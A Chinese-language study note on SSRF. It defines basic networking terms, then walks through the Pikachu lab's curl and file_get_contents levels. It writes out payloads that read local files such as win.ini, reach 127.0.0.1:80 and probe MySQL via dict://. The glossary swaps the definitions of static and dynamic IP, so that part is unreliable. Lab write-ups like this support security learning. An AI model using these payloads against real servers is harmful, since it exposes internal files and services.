概念補充：

內網：局部范圍內的私有網絡，比如局域網就是一個小范圍的內網，有私有IP，并且內網受防火墻的保護，外網無法直接訪問

外網：全球范圍的公共網絡，公有ip

ip地址：

• 靜態ip：比如家庭寬帶，經常改變
• 動態ip：比如服務器ip，固定不變
• 作用：標識一臺設備，確保數據能準確的傳達

域名：字母和單詞代替數字，依賴dns解析轉換成ip才能訪問

curl：個人理解，是一種服務器訪問url的工具，就像輸入url獲取內容，但該功能對用戶提交的url沒有嚴格的過濾，導致攻擊者可以讓服務器訪問本不該訪問的內部資源

ssrf（服務器端請求偽造）：

ssrf的形成大多數是由服務端提供了從其他服務器應用獲取數據的功能（比如curl），并且沒有對目標地址做出限制

端口：

通過端口可以區分不同服務

作用：讓一臺設備同時運行多個網絡服務

一：SSRF（curl）

點擊鏈接，觀察頂部url

http://10.24.11.221/pikachu/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php

建立新頁面，復制url后鏈接過去，發現頁面鏈接內容

所以我們嘗試通過修改url后面的網址鏈接來在當前頁面顯示不一樣的東西

1.回顯公網url

比如把鏈接改成百度官網

http://www.baidu.com

成功回顯

2.嘗試讀取主機文件?

在d盤放了一個測試文件，回顯成功

?url=file://D:/testpk.txt

3.掃描本地端口

輸入win.ini

?url=file:///C:/Windows/win.ini

成功回顯，嘗試掃描端口

本地web服務目錄：

?url=http://127.0.0.1:80

Mysql：?

?url=dict://127.0.0.1:3306

二：SSRF（file_get_content）?

和上一關一樣的方法，但把url改成了file

?file=http://www.baidu.com
?file=file://D:/testpk.txt
?file=file:///C:/Windows/win.ini
?file=dict://127.0.0.1:3306
?file=http://127.0.0.1:80

???完結撒花！！！???